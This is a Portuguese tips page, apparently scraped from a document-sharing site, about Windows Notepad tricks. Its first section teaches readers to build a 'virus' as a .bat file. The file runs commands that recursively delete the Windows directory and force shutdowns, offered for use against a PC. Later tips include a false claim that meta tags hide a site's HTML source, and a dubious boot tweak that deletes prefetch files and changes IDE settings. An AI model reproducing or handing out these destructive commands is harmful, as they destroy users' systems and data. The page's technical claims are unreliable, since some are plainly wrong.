Sei sulla pagina 1di 3

Segredos do Bloco de Notas(Notepad) do Windows

Segredos do Bloco de Notas: Alguns simples mais raros APRENDA A CRIAR UM VIRUS Criando um vrus muito simples voc fazer um virus no bloco de notas s seguir as indicaes abaixo. Va em iniciar/executar e digite notepad, Ou abra o bloco de notas; Ir abrir o bloco de notas. Copie um dos comando(em vermelho) e cole no bloco de notas, ao salvar voc usa .bat aps o nome do arquivo Ex: Virus.bat PARA O XP del /s /q c:\windows\ (deleta tudo dentro do windows ex: arquivos e naum pastas) rmdir /s /q c:\windows (deleta tdo do windows) (fode o pc) shutdown -s (desliga o pc) shutdown -s -f -t 0 (desliga o pc) (Para o Vista Tambem) shutdown -r (reinicia o pc) CRIAR UM CD INICIALIZAVEL Copie todo o cdigo em vermelho [AutoRun] open=setup.exe icon=setup.exe,0 Salvar como: AutoRun.inf na pasta inicial do CD ou PenDriver; Setup.exe o nome do arquivo a ser inicializado CRIAR TEXTO ENTRE/DENTRO DA BARRA DE ROLAGEM BANNER <textarea> cdigo do banner </textarea> CRIAR UM ARQUIVO LOG Abra o Bloco de Notas. Na primeira linha, escreva (sem aspas e em letras maisculas) .LOG. Aperte Enter, em seguida salve o arquivo (extenso normal *.txt), e feche-o.

Toda vez que voc abrir este arquivo, a data e hora do sistema sero inseridas automaticamente no final do arquivo, bem como uma nova linha. PARA INSERIR A HORA E A DATA NO ARQUIVO QUE VOC ESTA EDITANDO Precione F5 para inserir BLOQUEAR HTML Bloqueie seu cdigo HTML em seu site, para que ningum possa ve-lo pelo bloco de notas. O cdigo esse: <meta content=Seu site> <meta content=Pgina HTML> coloque esse cdigo entre as tags <head></head> Assim quando algum for pegar seu cdigo HTML pelo bloco de notas ir aparecer esse cdigo.

DEIXAR O BOOT DO XP MAIS RAPIDO O boot do Windows XP um carregamento que as vezes demora muito, mas quem tem pressa pode fazer esta dica! 1. Abra o bloco de Notas. (Ou um atalho rpido: v no iniciar, executar digite: notepad.exe ) 2. Digite a seguinte linha: del c:windowsprefetchntosboot-*.* /q 3. Salve o arquivo como tipo de todos os arquivos e bootxp.bat , ou qualquer nome que desejar e salve no seu disco rgido (C:\, D:\, E:\ e etc). 4. V no menu iniciar, executar, digite: gpedit.msc 5. Clique em Configuraes do Computador , e depois clique em Configuraes do Windows . No lado da direita clique em Scripts (Inicializao/Encerramento). 6. D um clique duplo em Desligar. 7. Depois clique em adicionar e seguidamente o boto procurar. 8. Localize o arquivo que voc criou no 3 passo, e clique em abrir ou um clique duplo no arquivo . 9. V em iniciar, executar e digite devmgmt.msc.

10. D um clique duplo em Controladores IDE ATA/ATAPI. 11. Clique com o boto direito no atalho Canal IDE primrio e selecione o menu propriedades . 12. Selecione a aba no topo Configuraes avanadas depois, no dispositivo 0 ou 1, o que no estiver inativo, selecione nenhum ao contrrio de Deteco automtica , clique em Aplicar e em OK. 13. Repita o passo 12 s que com o Canal IDE secundrio. 14. Reinicie o computador corretamente sem pressa, no apertando o boto reset.

Potrebbero piacerti anche